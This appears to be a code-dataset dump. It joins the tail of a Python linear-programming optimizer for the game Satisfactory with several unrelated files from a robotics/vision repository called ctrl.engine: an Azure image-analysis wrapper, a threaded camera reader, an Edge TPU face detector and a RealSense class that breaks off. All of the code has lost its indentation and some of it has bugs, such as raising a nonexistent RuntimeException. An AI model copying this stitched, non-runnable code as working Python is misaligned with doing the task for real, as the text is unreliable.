with open(docs_path, "r", encoding="utf-16") as f:
docs_raw = json.load(f)
class_entries = {}
class_types = {}
for fg_entry in docs_raw:
class_type = re.sub(r"Class'/Script/FactoryGame.(\w+)'", r"\1", fg_entry["NativeClass"])
class_type_list = []
for class_entry in fg_entry["Classes"]:
class_name = class_entry["ClassName"]
if class_name in class_entries:
print(f"WARNING: ignoring duplicate class {class_name}")
else:
class_entries[class_name] = class_entry
class_type_list.append(class_entry)
class_types[class_type] = class_type_list
### Parsing helpers ###
def parse_paren_list(s):
if not s:
return None
assert(s.startswith("(") and s.endswith(")"))
s = s[1:-1]
if not s:
return []
else:
return s.split(",")
def find_class_name(s):
m = re.search(r"\.\w+", s)
if m is None:
raise ValueError(f"could not find class name in: {s}")
return m[0][1:]
def parse_class_list(s):
l = parse_paren_list(s)
if l is None:
return l
return [find_class_name(x) for x in l]
def find_item_amounts(s):
for m in re.finditer(r"\(ItemClass=([^,]+),Amount=(\d+)\)", s):
yield (find_class_name(m[1]), int(m[2]))
### Misc constants ###
CONVEYOR_BELT_LIMIT = 0.5 * float(class_entries[CONVEYOR_BELT_CLASS]["mSpeed"])
PIPELINE_LIMIT = 60000.0 * float(class_entries[PIPELINE_CLASS]["mFlowLimit"])
SINK_POWER_CONSUMPTION = float(class_entries[SINK_CLASS]["mPowerConsumption"])
print(f"CONVEYOR_BELT_LIMIT: {CONVEYOR_BELT_LIMIT}")
print(f"PIPELINE_LIMIT: {PIPELINE_LIMIT}")
print(f"SINK_POWER_CONSUMPTION: {SINK_POWER_CONSUMPTION}")
### Miners ###
def parse_miner(entry):
if entry["ClassName"] == RESOURCE_WELL_PRESSURIZER_CLASS:
extractor = class_entries[RESOURCE_WELL_EXTRACTOR_CLASS]
else:
extractor = entry
return {
"class": entry["ClassName"],
"display_name": entry["mDisplayName"],
"power_consumption": float(entry["mPowerConsumption"]),
"power_consumption_exponent": float(entry["mPowerConsumptionExponent"]),
"min_clock": float(entry["mMinPotential"]),
"max_clock_base": float(entry["mMaxPotential"]),
"max_clock_per_power_shard": float(entry["mMaxPotentialIncreasePerCrystal"]),
"rate": 60.0 / float(extractor["mExtractCycleTime"]) * float(extractor["mItemsPerCycle"]),
"only_allow_certain_resources": (extractor["mOnlyAllowCertainResources"] == "True"),
"allowed_resource_forms": parse_paren_list(extractor["mAllowedResourceForms"]),
"allowed_resources": parse_class_list(extractor["mAllowedResources"]),
}
miners = {}
for name in (MINER_CLASS, OIL_EXTRACTOR_CLASS, WATER_EXTRACTOR_CLASS, RESOURCE_WELL_PRESSURIZER_CLASS):
miners[name] = parse_miner(class_entries[name])
# pprint(miners)
### Manufacturers ###
def parse_manufacturer(entry):
return {
"class": entry["ClassName"],
"display_name": entry["mDisplayName"],
"power_consumption": float(entry["mPowerConsumption"]),
"power_consumption_exponent": float(entry["mPowerConsumptionExponent"]),
"min_clock": float(entry["mMinPotential"]),
"max_clock_base": float(entry["mMaxPotential"]),
"max_clock_per_power_shard": float(entry["mMaxPotentialIncreasePerCrystal"]),
}
manufacturers = {}
for entry in class_types["FGBuildableManufacturer"]:
manufacturer = parse_manufacturer(entry)
manufacturer["is_variable_power"] = False
manufacturers[entry["ClassName"]] = manufacturer
for entry in class_types["FGBuildableManufacturerVariablePower"]:
manufacturer = parse_manufacturer(entry)
manufacturer["is_variable_power"] = True
manufacturers[entry["ClassName"]] = manufacturer
# pprint(manufacturers)
### Recipes ###
def parse_recipe(entry):
recipe_manufacturer = None
for manufacturer in parse_class_list(entry["mProducedIn"]) or []:
if manufacturer in manufacturers:
recipe_manufacturer = manufacturer
break
# we are only considering automatable recipes
if recipe_manufacturer is None:
return None
rate = 60.0 / float(entry["mManufactoringDuration"])
def item_rates(key):
return [(item, rate * amount) for (item, amount) in find_item_amounts(entry[key])]
vpc_constant = float(entry["mVariablePowerConsumptionConstant"])
vpc_factor = float(entry["mVariablePowerConsumptionFactor"])
return {
"class": entry["ClassName"],
"display_name": entry["mDisplayName"],
"manufacturer": recipe_manufacturer,
"inputs": item_rates("mIngredients"),
"outputs": item_rates("mProduct"),
"variable_power_consumption": vpc_constant + 0.5 * vpc_factor,
}
recipes = {}
for entry in class_types["FGRecipe"]:
recipe = parse_recipe(entry)
if recipe is not None:
recipes[entry["ClassName"]] = recipe
# pprint(recipes)
### Items ###
def parse_item(entry):
points = int(entry["mResourceSinkPoints"])
return {
"display_name": entry["mDisplayName"],
"form": entry["mForm"],
"points": int(entry["mResourceSinkPoints"]),
"stack_size": STACK_SIZES[entry["mStackSize"]],
"energy": float(entry["mEnergyValue"]),
}
items = {}
# any items not contained in Docs.json
items.update(ADDITIONAL_ITEMS)
for class_type in [
"FGItemDescriptor",
"FGItemDescriptorBiomass",
"FGItemDescriptorNuclearFuel",
"FGResourceDescriptor",
"FGEquipmentDescriptor",
"FGConsumableDescriptor",
]:
for entry in class_types[class_type]:
item = parse_item(entry)
if class_type == "FGItemDescriptorNuclearFuel":
item["nuclear_waste"] = NUCLEAR_WASTE_MAPPINGS[entry["ClassName"]]
item["nuclear_waste_amount"] = float(entry["mAmountOfWaste"])
items[entry["ClassName"]] = item
# pprint(items)
### Generators ###
generators = {}
def parse_generator(entry):
power_production = float(entry["mPowerProduction"])
return {
"display_name": entry["mDisplayName"],
"fuel_classes": parse_class_list(entry["mDefaultFuelClasses"]),
"power_production": power_production,
"power_production_exponent": float(entry["mPowerProductionExponent"]),
"requires_supplemental": (entry["mRequiresSupplementalResource"] == "True"),
"supplemental_to_power_ratio": float(entry["mSupplementalToPowerRatio"]),
}
def parse_geothermal_generator(entry):
# unclear why mVariablePowerProductionConstant=0 in the json;
# it's set to 100.0f in the header, which we will hardcode here
return {
"display_name": entry["mDisplayName"],
"power_production": 100.0 + 0.5 * float(entry["mVariablePowerProductionFactor"]),
}
# coal and fuel generators
for entry in class_types["FGBuildableGeneratorFuel"]:
# exclude biomass generator
if entry["ClassName"] == BIOMASS_GENERATOR_CLASS:
continue
generators[entry["ClassName"]] = parse_generator(entry)
# nuclear power plant
for entry in class_types["FGBuildableGeneratorNuclear"]:
generators[entry["ClassName"]] = parse_generator(entry)
# geothermal generator (special case)
geothermal_generator = parse_geothermal_generator(class_entries[GEOTHERMAL_GENERATOR_CLASS])
# pprint(generators)
### Resources ###
with open(map_info_path, "r") as f:
map_info_raw = json.load(f)
map_info = {}
for tab in map_info_raw["options"]:
if "tabId" in tab:
map_info[tab["tabId"]] = tab["options"]
TOTAL_POWER_SHARDS = 0
for slug_type in map_info["power_slugs"][0]["options"]:
TOTAL_POWER_SHARDS += POWER_SLUG_SHARDS[slug_type["layerId"]] * len(slug_type["markers"])
print(f"TOTAL_POWER_SHARDS: {TOTAL_POWER_SHARDS}")
resources = {}
geysers = {}
def parse_and_add_node_type(node_type):
if "type" not in node_type:
return
item = node_type["type"]
if item in RESOURCE_MAPPINGS:
item = RESOURCE_MAPPINGS[item]
if item is None:
return
output = geysers if item == GEYSER_CLASS else resources
for node_purity in node_type["options"]:
purity = node_purity["purity"]
nodes = node_purity["markers"]
if not nodes:
continue
sample_node = nodes[0]
if "core" in sample_node:
# resource well satellite nodes, map them to cores
for node in nodes:
subtype = find_class_name(node["core"])
resource_id = f"{item}|{subtype}"
if resource_id not in output:
output[resource_id] = {
"resource_id": resource_id,
"item": item,
"subtype": subtype,
"multiplier": 0.0,
"count": 1,
"is_limited": True,
"is_resource_well": True,
"num_satellites": 0,
}
output[resource_id]["multiplier"] += PURITY_MULTIPLIERS[purity]
output[resource_id]["num_satellites"] += 1
else:
# normal nodes, add directly
subtype = purity
resource_id = f"{item}|{subtype}"
assert(resource_id not in output)
output[resource_id] = {
"resource_id": resource_id,
"item": item,
"subtype": subtype,
"multiplier": PURITY_MULTIPLIERS[purity],
"count": len(nodes),
"is_limited": True,
"is_resource_well": False,
}
for node_type in map_info["resource_nodes"]:
parse_and_add_node_type(node_type)
for node_type in map_info["resource_wells"]:
parse_and_add_node_type(node_type)
resources[WATER_CLASS] = {
"resource_id": f"{WATER_CLASS}:extractor",
"item": WATER_CLASS,
"subtype": "extractor",
"multiplier": 1,
"is_limited": False,
"is_resource_well": False,
}
# pprint(resources)
# pprint(geysers)
### LP setup ###
class LPColumn(dict):
def __init__(self, *args, display_info=None, **kwargs):
super().__init__(*args, **kwargs)
self.display_info = display_info
lp_columns = {}
lp_equalities = {}
lp_lower_bounds = {}
def get_power_consumption(machine, clock=1.0, recipe=None):
power_consumption = machine["power_consumption"]
if recipe is not None and machine.get("is_variable_power", False):
power_consumption += recipe["variable_power_consumption"]
return power_consumption * (clock ** machine["power_consumption_exponent"])
def get_miner_for_resource(resource):
item_class = resource["item"]
item = items[item_class]
candidates = []
for miner_class, miner in miners.items():
if ((resource["is_resource_well"]) == (miner_class == RESOURCE_WELL_PRESSURIZER_CLASS)
and item["form"] in miner["allowed_resource_forms"]
and (not miner["only_allow_certain_resources"] or item_class in miner["allowed_resources"])):
candidates.append(miner_class)
if not candidates:
raise RuntimeError(f"could not find miner for resource {item_class}")
elif len(candidates) > 1:
raise RuntimeError(f"more than one miner for resource {item_class}: {candidates}")
return candidates[0]
def get_form_conveyance_limit(form):
if form == "RF_SOLID":
return CONVEYOR_BELT_LIMIT
elif form == "RF_LIQUID" or form == "RF_GAS":
return PIPELINE_LIMIT
else:
assert(False)
def get_max_overclock(machine):
return machine["max_clock_base"] + MACHINE_POWER_SHARD_LIMIT * machine["max_clock_per_power_shard"]
def get_conveyance_limit_clock(item, rate):
conveyance_limit = get_form_conveyance_limit(item["form"])
return math.floor(1000000 * conveyance_limit / rate) / 1000000
def get_max_miner_clock(miner, resource, rate):
max_overclock = get_max_overclock(miner)
if resource["is_resource_well"]:
return max_overclock
item_class = resource["item"]
item = items[item_class]
return min(max_overclock, get_conveyance_limit_clock(item, rate))
def get_max_manufacturer_clock(manufacturer, recipe):
max_clock = get_max_overclock(manufacturer)
for (item_class, rate) in recipe["inputs"]:
max_clock = min(max_clock, get_conveyance_limit_clock(items[item_class], rate))
for (item_class, rate) in recipe["outputs"]:
max_clock = min(max_clock, get_conveyance_limit_clock(items[item_class], rate))
return max_clock
def get_power_shards_needed(machine, clock):
return max(0, math.ceil((clock - machine["max_clock_base"]) / machine["max_clock_per_power_shard"]))
def get_item_display_name(item_class):
if item_class in items:
return items[item_class]["display_name"]
else:
return ADDITIONAL_DISPLAY_NAMES[item_class]
def add_lp_column(column, type_, name, display_name=None, machine_name=None, subtype=None, clock=None):
tokens = [type_, name]
if subtype is not None:
tokens.append(subtype)
if clock is not None:
clock_percent = 100.0 * clock
tokens.append(f"{clock_percent}")
column_id = "|".join(tokens)
display_info = {
"type": type_,
"display_name": display_name or name,
"machine_name": machine_name,
"subtype": subtype,
"clock": clock,
}
lp_columns[column_id] = LPColumn(column, display_info=display_info)
for resource_id, resource in resources.items():
item_class = resource["item"]
item = items[item_class]
miner_class = get_miner_for_resource(resource)
miner = miners[miner_class]
rate = miner["rate"] * resource["multiplier"]
min_clock = miner["min_clock"]
max_clock_base = miner["max_clock_base"]
max_clock = get_max_miner_clock(miner, resource, rate)
resource_var = f"resource|{resource_id}"
item_var = f"item|{item_class}"
clock_choices = {max_clock_base, max_clock}
for clock in args.extra_miner_clocks:
clock = min(max_clock, max(min_clock, clock))
clock_choices.add(clock)
for clock in sorted(clock_choices):
column = {
item_var: clock * rate,
"power_consumption": get_power_consumption(miner, clock=clock),
"machines": 1 + (resource["num_satellites"] if resource["is_resource_well"] else 0),
}
if resource["is_limited"]:
column[resource_var] = -1
power_shards = get_power_shards_needed(miner, clock)
if power_shards > 0:
column["power_shard_usage"] = power_shards
add_lp_column(
column,
type_="miner",
name=resource_id,
display_name=item["display_name"],
machine_name=miner["display_name"],
subtype=resource["subtype"],
clock=clock,
)
if resource["is_limited"]:
lp_lower_bounds[resource_var] = -resource["count"]
lp_equalities[item_var] = 0.0
for recipe_class, recipe in recipes.items():
manufacturer_class = recipe["manufacturer"]
manufacturer = manufacturers[manufacturer_class]
min_clock = manufacturer["min_clock"]
max_clock_base = manufacturer["max_clock_base"]
max_clock = get_max_manufacturer_clock(manufacturer, recipe)
# let's not allow manufacturer OC by default, but it can be specified via option
clock_choices = {min_clock, max_clock_base}
for clock in args.extra_manufacturer_clocks:
clock = min(max_clock, max(min_clock, clock))
clock_choices.add(clock)
for clock in sorted(clock_choices):
column = {
"power_consumption": get_power_consumption(manufacturer, clock=clock, recipe=recipe),
"machines": 1,
}
for (item_class, rate) in recipe["inputs"]:
item_var = f"item|{item_class}"
column[item_var] = column.get(item_var, 0.0) - clock * rate
lp_equalities[item_var] = 0.0
for (item_class, rate) in recipe["outputs"]:
item_var = f"item|{item_class}"
column[item_var] = column.get(item_var, 0.0) + clock * rate
lp_equalities[item_var] = 0.0
power_shards = get_power_shards_needed(manufacturer, clock)
if power_shards > 0:
column["power_shard_usage"] = power_shards
add_lp_column(
column,
type_="manufacturer",
name=recipe_class,
display_name=recipe["display_name"],
machine_name=manufacturer["display_name"],
clock=clock,
)
for item_class, item in items.items():
points = item["points"]
item_var = f"item|{item_class}"
if not (item["form"] == "RF_SOLID" and points > 0):
if args.allow_waste:
add_lp_column(
{item_var: -1},
type_="waste",
name=item_class,
display_name=item["display_name"],
)
continue
column = {
item_var: -1,
"points": points,
"power_consumption": SINK_POWER_CONSUMPTION / CONVEYOR_BELT_LIMIT,
"machines": 1 / CONVEYOR_BELT_LIMIT,
}
add_lp_column(
column,
type_="sink",
name=item_class,
display_name=item["display_name"],
)
lp_equalities[item_var] = 0.0
for generator_class, generator in generators.items():
power_production = generator["power_production"]
for fuel_class in generator["fuel_classes"]:
fuel = items[fuel_class]
fuel_rate = 60.0 * power_production / fuel["energy"]
fuel_var = f"item|{fuel_class}"
column = {
fuel_var: -fuel_rate,
"power_production": power_production,
"machines": 1,
}
if generator["requires_supplemental"]:
supplemental_class = WATER_CLASS
supplemental_var = f"item|{supplemental_class}"
supplemental_rate = 60.0 * power_production * generator["supplemental_to_power_ratio"]
column[supplemental_var] = -supplemental_rate
lp_equalities[supplemental_var] = 0.0
if fuel_class in NUCLEAR_WASTE_MAPPINGS:
waste_class = NUCLEAR_WASTE_MAPPINGS[fuel_class]
waste_var = f"item|{waste_class}"
column[waste_var] = fuel_rate * fuel["nuclear_waste_amount"]
lp_equalities[waste_var] = 0.0
add_lp_column(
column,
type_="generator",
name=fuel_class,
display_name=fuel["display_name"],
machine_name=generator["display_name"],
clock=1,
)
for resource_id, resource in geysers.items():
resource_var = f"resource|{resource_id}"
column = {
resource_var: -1,
"power_production": geothermal_generator["power_production"] * resource["multiplier"],
"machines": 1,
}
add_lp_column(
column,
type_="generator",
name=resource_id,
display_name=get_item_display_name(GEYSER_CLASS),
machine_name=geothermal_generator["display_name"],
subtype=resource["subtype"],
)
lp_lower_bounds[resource_var] = -resource["count"]
for column_id, column in lp_columns.items():
to_add = defaultdict(float)
for variable, coeff in column.items():
if abs(coeff) < EPSILON:
print(f"WARNING: zero or near-zero coeff: column_id={column_id} variable={variable} coeff={coeff}")
if variable.startswith("item|") and coeff > 0:
item_class = variable[5:]
if item_class not in items:
print(f"WARNING: item not found in items dict: {item_class}")
continue
item = items[item_class]
form = item["form"]
conveyance_limit = get_form_conveyance_limit(form)
conveyance = coeff / conveyance_limit
if column_id.startswith("miner|"):
to_add["transport_power_cost"] += args.transport_power_cost * conveyance
to_add["drone_battery_cost"] += args.drone_battery_cost * conveyance
if form == "RF_SOLID":
to_add["conveyors"] += conveyance
else:
to_add["pipelines"] += conveyance
for variable, coeff in to_add.items():
if coeff != 0.0:
column[variable] = column.get(variable, 0.0) + coeff
for objective in ["points", "machines", "conveyors", "pipelines"]:
column = {
objective: -1,
}
add_lp_column(
column,
type_="objective",
name=objective,
)
lp_equalities[objective] = 0.0
for extra_cost, cost_variable, cost_coeff in [
("transport_power_cost", "power_consumption", 1.0),
("drone_battery_cost", f"item|{BATTERY_CLASS}", -1.0),
]:
column = {
extra_cost: -1,
cost_variable: cost_coeff,
}
add_lp_column(
column,
type_="extra_cost",
name=extra_cost,
)
lp_equalities[extra_cost] = 0.0
column = {
"power_consumption": -1,
"power_production": -1,
}
add_lp_column(
column,
type_="power",
name="usage",
)
lp_equalities["power_consumption"] = 0.0
lp_lower_bounds["power_production"] = 0.0
column = {
"power_shard_usage": -1,
"power_shards": -1,
}
add_lp_column(
column,
type_="objective",
name="power_shards",
)
lp_equalities["power_shard_usage"] = 0.0
lp_lower_bounds["power_shards"] = -TOTAL_POWER_SHARDS
# pprint(lp_columns)
# pprint(lp_equalities)
# pprint(lp_lower_bounds)
def get_all_variables():
variables = set()
for column_id, column in lp_columns.items():
for variable, coeff in column.items():
variables.add(variable)
for variable in variables:
if variable not in lp_equalities and variable not in lp_lower_bounds:
print(f"WARNING: no constraint for variable: {variable}")
for variable in lp_equalities.keys():
if variable not in variables:
print(f"WARNING: equality constraint with unknown variable: {variable}")
for variable in lp_lower_bounds.keys():
if variable not in variables:
print(f"WARNING: lower bound constraint with unknown variable: {variable}")
return variables
variables = get_all_variables()
# pprint(variables)
### Pruning ###
reachable_items = set()
while True:
any_added = False
for column_id, column in lp_columns.items():
eligible = True
to_add = set()
for variable, coeff in column.items():
if variable.startswith("item|") and variable not in reachable_items:
if coeff > 0:
to_add.add(variable)
elif coeff < 0:
eligible = False
break
if eligible and to_add:
any_added = True
reachable_items |= to_add
if not any_added:
break
unreachable_items = set(v for v in variables if v.startswith("item|")) - reachable_items
print("pruning unreachable items:")
pprint(unreachable_items)
columns_to_prune = list()
for column_id, column in lp_columns.items():
for variable, coeff in column.items():
if variable in unreachable_items and coeff < 0:
columns_to_prune.append(column_id)
break
for column_id in columns_to_prune:
# pprint(lp_columns[column_id])
del lp_columns[column_id]
for item_var in unreachable_items:
if item_var in lp_equalities:
del lp_equalities[item_var]
variables = get_all_variables()
# pprint(variables)
# pprint(lp_columns)
# pprint(lp_equalities)
# pprint(lp_lower_bounds)
### LP run ###
def to_index_map(seq):
return {value: index for index, value in enumerate(seq)}
def from_index_map(d):
result = [None] * len(d)
for value, index in d.items():
result[index] = value
return result
# order is for report display, but we might as well sort it here
column_type_order = to_index_map(["objective", "power", "extra_cost", "sink", "waste", "manufacturer", "miner", "generator"])
column_subtype_order = to_index_map(["impure", "normal", "pure"])
objective_order = to_index_map(["points", "machines", "conveyors", "pipelines", "power_shards"])
extra_cost_order = to_index_map(["transport_power_cost", "drone_battery_cost"])
def column_order_key(arg):
column_id, column = arg
info = column.display_info
type_ = info["type"]
if type_ in column_type_order:
type_key = (0, column_type_order[type_])
else:
type_key = (1, type_)
name = info["display_name"]
if type_ == "objective":
name_key = objective_order[name]
elif type_ == "extra_cost":
name_key = extra_cost_order[name]
else:
name_key = name
subtype = info["subtype"]
if subtype in column_subtype_order:
subtype_key = (0, column_subtype_order[subtype])
else:
subtype_key = (1, subtype)
return (type_key, name_key, subtype_key, info["clock"], column_id)
sorted_columns = sorted(lp_columns.items(), key=column_order_key)
indices_eq = to_index_map(sorted(lp_equalities.keys()))
indices_lb = to_index_map(sorted(lp_lower_bounds.keys()))
# pprint(indices_eq)
# pprint(indices_lb)
lp_c = np.zeros(len(lp_columns), dtype=np.double)
lp_A_eq = np.zeros((len(lp_equalities), len(lp_columns)), dtype=np.double)
lp_b_eq = np.zeros(len(lp_equalities), dtype=np.double)
lp_A_lb = np.zeros((len(lp_lower_bounds), len(lp_columns)), dtype=np.double)
lp_b_lb = np.zeros(len(lp_lower_bounds), dtype=np.double)
objective_weights = {f"objective|{obj}": weight for (obj, weight) in {
"points": 1,
"machines": -args.machine_penalty,
"conveyors": -args.conveyor_penalty,
"pipelines": -args.pipeline_penalty,
"power_shards": -args.power_shard_penalty_ratio * args.machine_penalty,
}.items()}
for column_index, (column_id, column) in enumerate(sorted_columns):
if column_id in objective_weights:
lp_c[column_index] = objective_weights[column_id]
for variable, coeff in column.items():
if variable in lp_equalities:
lp_A_eq[indices_eq[variable], column_index] = coeff
else:
lp_A_lb[indices_lb[variable], column_index] = coeff
for variable, rhs in lp_equalities.items():
lp_b_eq[indices_eq[variable]] = rhs
for variable, rhs in lp_lower_bounds.items():
lp_b_lb[indices_lb[variable]] = rhs
print("running LP")
lp_result = scipy.optimize.linprog(-lp_c, A_ub=-lp_A_lb, b_ub=-lp_b_lb, A_eq=lp_A_eq, b_eq=lp_b_eq, method="highs")
if lp_result.status != 0:
print("ERROR: LP did not terminate successfully")
pprint(lp_result)
sys.exit(1)
pprint(lp_result)
### Display formatting ###
def format_subtype(subtype):
if subtype is None or subtype == "extractor":
return None
return re.sub(r"^BP_FrackingCore_?", "#", subtype).capitalize()
def get_column_desc(column):
info = column.display_info
tokens = [info["machine_name"] or info["type"], info["display_name"]]
subtype = format_subtype(info["subtype"])
if subtype is not None:
tokens.append(subtype)
if info["clock"] is not None:
clock_percent = 100.0 * info["clock"]
tokens.append(f"{clock_percent}%")
return "|".join(tokens)
column_results = [
(column_id, column, lp_result.x[column_index])
for column_index, (column_id, column) in enumerate(sorted_columns)
]
if not args.show_unused:
column_results = list(filter(lambda x: abs(x[2]) > EPSILON, column_results))
variable_breakdowns = {variable: {"production": [], "consumption": []} for variable in variables}
for column_id, column, column_coeff in column_results:
column_desc = get_column_desc(column)
print(f"{column_desc} = {column_coeff}")
for variable, coeff in column.items():
rate = column_coeff * coeff
source = {
"desc": column_desc,
"count": column_coeff,
"rate": abs(rate),
}
if abs(rate) < EPSILON:
continue
elif rate > 0:
variable_breakdowns[variable]["production"].append(source)
else:
variable_breakdowns[variable]["consumption"].append(source)
variable_order = to_index_map(
from_index_map(objective_order)
+ ["power_production", "power_consumption"]
+ from_index_map(extra_cost_order)
+ ["power_shards", "power_shard_usage", "item", "resource"]
)
def get_variable_display_info(variable):
tokens = variable.split("|")
type_ = tokens[0]
if type_ == "item" or type_ == "resource":
item_class = tokens[1]
tokens[1] = get_item_display_name(item_class)
return (type_, "|".join(tokens))
def finalize_variable_budget_side(budget_side):
if not budget_side:
return
total_rate = 0.0
for entry in budget_side:
total_rate += entry["rate"]
for entry in budget_side:
entry["share"] = entry["rate"] / total_rate
budget_side.sort(key=lambda entry: (-entry["share"], entry["desc"]))
budget_side.insert(0, {"desc": "Total", "count": "n/a", "rate": total_rate, "share": 1.0})
for variable, breakdown in variable_breakdowns.items():
type_, name = get_variable_display_info(variable)
# don't show offsetting dummy items in the breakdown (e.g. "objective|points" as consumer of points)
# currently these are precisely the consumption of special variables, but that may change
if type_ not in ["item", "resource"]:
breakdown["consumption"] = []
breakdown["type_order"] = variable_order[type_]
breakdown["name"] = name
if variable in indices_lb:
slack = lp_result.slack[indices_lb[variable]]
if slack < -EPSILON:
print(f"WARNING: lower bound violation: variable={variable} slack={slack}")
breakdown["initial"] = -lp_lower_bounds[variable]
breakdown["final"] = slack
else:
con = lp_result.con[indices_eq[variable]]
if abs(con) > EPSILON:
print(f"WARNING: equality constraint violation: variable={variable} con={con}")
finalize_variable_budget_side(breakdown["production"])
finalize_variable_budget_side(breakdown["consumption"])
sorted_variable_breakdowns = sorted(variable_breakdowns.values(), key=lambda bd: (bd["type_order"], bd["name"]))
# pprint(sorted_variable_breakdowns)
if args.xlsx_report:
print("writing xlsx report")
import xlsxwriter
workbook = xlsxwriter.Workbook(args.xlsx_report)
default_format = workbook.add_format({"align": "center"})
top_format = workbook.add_format({"align": "center", "top": True})
bold_format = workbook.add_format({"align": "center", "bold": True})
bold_underline_format = workbook.add_format({"align": "center", "bold": True, "underline": True})
bold_top_format = workbook.add_format({"align": "center", "bold": True, "top": True})
bold_underline_top_format = workbook.add_format({"align": "center", "bold": True, "underline": True, "top": True})
percent_format = workbook.add_format({"align": "center", "num_format": "0.0#####%"})
sheet1 = workbook.add_worksheet("List" + args.xlsx_sheet_suffix)
sheet2 = workbook.add_worksheet("Breakdown" + args.xlsx_sheet_suffix)
def write_cell(sheet, *args, fmt=default_format):
sheet.write(*args, fmt)
sheet1.add_table(0, 0, len(column_results), 5, {
"columns": [{"header": header, "header_format": bold_format}
for header in ["Type", "Name", "Machine", "Subtype", "Clock", "Quantity"]],
"style": "Table Style Light 16",
})
for i, (column_id, column, column_coeff) in enumerate(column_results):
info = column.display_info
write_cell(sheet1, i + 1, 0, info["type"])
write_cell(sheet1, i + 1, 1, info["display_name"])
write_cell(sheet1, i + 1, 2, info["machine_name"] or "n/a")
write_cell(sheet1, i + 1, 3, info["subtype"] or "n/a")
write_cell(sheet1, i + 1, 4, info["clock"] or "n/a", fmt=percent_format)
write_cell(sheet1, i + 1, 5, column_coeff)
for c, width in enumerate([14, 39, 25, 19, 11, 13]):
sheet1.set_column(c, c, width)
current_row = 0
max_budget_entries = 0
budget_rows = [
("desc", "Producer", "Consumer"),
("count", "Producer Count", "Consumer Count"),
("rate", "Production Rate", "Consumption Rate"),
("share", "Production Share", "Consumption Share"),
]
production_share_cf = {
"type": "2_color_scale",
"min_type": "num",
"max_type": "num",
"min_value": 0,
"max_value": 1,
"min_color": "#FFFFFF",
"max_color": "#99FF99"
}
consumption_share_cf = production_share_cf.copy()
consumption_share_cf["max_color"] = "#FFCC66"
for variable_index, breakdown in enumerate(sorted_variable_breakdowns):
for budget_side_index, budget_side_name in enumerate(["production", "consumption"]):
budget_side = breakdown[budget_side_name]
if not budget_side:
continue
for budget_row in budget_rows:
key = budget_row[0]
name = budget_row[budget_side_index + 1]
if key == "desc":
fmts = (bold_top_format, bold_underline_top_format)
elif key == "share":
fmts = (bold_format, percent_format)
else:
fmts = (bold_format, default_format)
write_cell(sheet2, current_row, 0, breakdown["name"], fmt=fmts[0])
write_cell(sheet2, current_row, 1, name, fmt=fmts[0])
for i, entry in enumerate(budget_side):
write_cell(sheet2, current_row, i + 2, entry[key], fmt=fmts[1])
if key == "share":
cf = production_share_cf if budget_side_name == "production" else consumption_share_cf
sheet2.conditional_format(current_row, 3, current_row, len(budget_side) + 1, cf)
max_budget_entries = max(max_budget_entries, len(budget_side))
current_row += 1
for key in ["initial", "final"]:
if key in breakdown:
if key == "initial":
fmts = (bold_top_format, top_format)
else:
fmts = (bold_format, default_format)
fmt = bold_top_format if key == "initial" else bold_format
write_cell(sheet2, current_row, 0, breakdown["name"], fmt=fmts[0])
write_cell(sheet2, current_row, 1, key.capitalize(), fmt=fmts[0])
write_cell(sheet2, current_row, 2, breakdown[key], fmt=fmts[1])
current_row += 1
for c, width in enumerate([41, 19, 13] + [59] * (max_budget_entries - 1)):
sheet2.set_column(c, c, width)
workbook.close()
``` |
{
"source": "0xJeremy/ctrl.engine",
"score": 3
} |
#### File: ctrlengine/ai/azure_vision.py
```python
import requests
import os
import cv2
class azure_vision():
FULL_ANALYSIS = 'Categories, Tags, Description, Faces'
def __init__(self, api_key=None, api_endpoint=None):
if api_key is None and 'AZURE_KEY' in os.environ:
api_key = os.environ['AZURE_KEY']
if api_endpoint is None and 'AZURE_ENDPOINT' in os.environ:
api_endpoint = os.environ['AZURE_ENDPOINT']
self.url = api_endpoint + "vision/v2.1/analyze"
self.headers = {
'Ocp-Apim-Subscription-Key': api_key,
'Content-Type': 'application/octet-stream'
}
self.response = None
self.analysis = None
def __encode_image(self, image):
ret, frame = cv2.imencode('.jpg', image)
if(ret != True):
raise RuntimeException("Problem Encoding Image to .jpg")
return frame.tostring()
def __run_analysis(self, image, params):
image = self.__encode_image(image)
params = {
'visualFeatures': params
}
self.response = requests.post(
self.url, headers=self.headers, params=params, data=image)
self.analysis = self.response.json()
return self.analysis
def analyze_image(self, image):
return self.__run_analysis(image, self.FULL_ANALYSIS)
def detect_faces(self, image):
return self.__run_analysis(image, 'Faces')
def analyze_categories(self, image):
return self.__run_analysis(image, 'Categories')
def analyze_description(self, image):
return self.__run_analysis(image, 'Description')
def analyze_tags(self, image):
return self.__run_analysis(image, 'Tags')
def analyze_brands(self, image):
return self.__run_analysis(image, 'Brands')
def custom_analysis(self, image, params):
return self.__run_analysis(image, params)
```
#### File: ctrlengine/sensors/camera.py
```python
from threading import Thread
import cv2
class camera():
RESOLUTION = (640, 480)
def __init__(self, cam_src=0, resolution=RESOLUTION):
self.cam = cv2.VideoCapture(cam_src)
self.cam.set(3, resolution[0])
self.cam.set(4, resolution[1])
self.ret = None
self.frame = None
self.stopped = False
Thread(target=self.run, args=()).start()
def get_frame(self):
return self.frame
def read(self):
return self.frame
def run(self):
while True:
if self.stopped:
self.cam.release()
return
self.ret, self.frame = self.cam.read()
def stop(self):
self.stopped = True
```
#### File: ctrlengine/ai/face_detection.py
```python
from edgetpu.detection.engine import DetectionEngine
import numpy as np
from PIL import Image
class face_detection:
MODEL = 'models/ssd_mobilenet_v2_face_quant_postprocess_edgetpu.tflite'
def __init__(self, threshold=0.5, num_results=10):
self.engine = DetectionEngine(face_detection.MODEL)
self.objs = None
self.boxes = None
self.scores = None
self.threshold = threshold
self.num_results = num_results
def set_threshold(self, num):
self.threshold = num
def set_max_results(self, num):
self.num_results = num
def detect(self, img):
img = Image.fromarray(img)
self.objs = self.engine.detect_with_image(
img, threshold=self.threshold, keep_aspect_ratio=True, relative_coord=False, top_k=self.num_results
)
self.boxes = [obj.bounding_box.flatten().tolist() for obj in self.objs]
self.scores = [obj.score for obj in self.objs]
return self.objs
def get_bounding_boxes(self):
return self.boxes
def get_scores(self):
return self.scores
```
#### File: ctrlengine/sensors/realsense.py
```python
import pyrealsense2 as rs
import numpy as np
import cv2
class realsense_camera:
RESOLUTION = (640, 480)
FPS = 30
def __init__(self, resolution=RESOLUTION, fps=FPS):
self.resolution = resolution
self.fps = fps
self.color_frame = None
self.depth_frame = None
self.color_image = None
self.depth_image = None
self.frames = None
self.pipe = rs.pipeline()
self.config = rs.config()
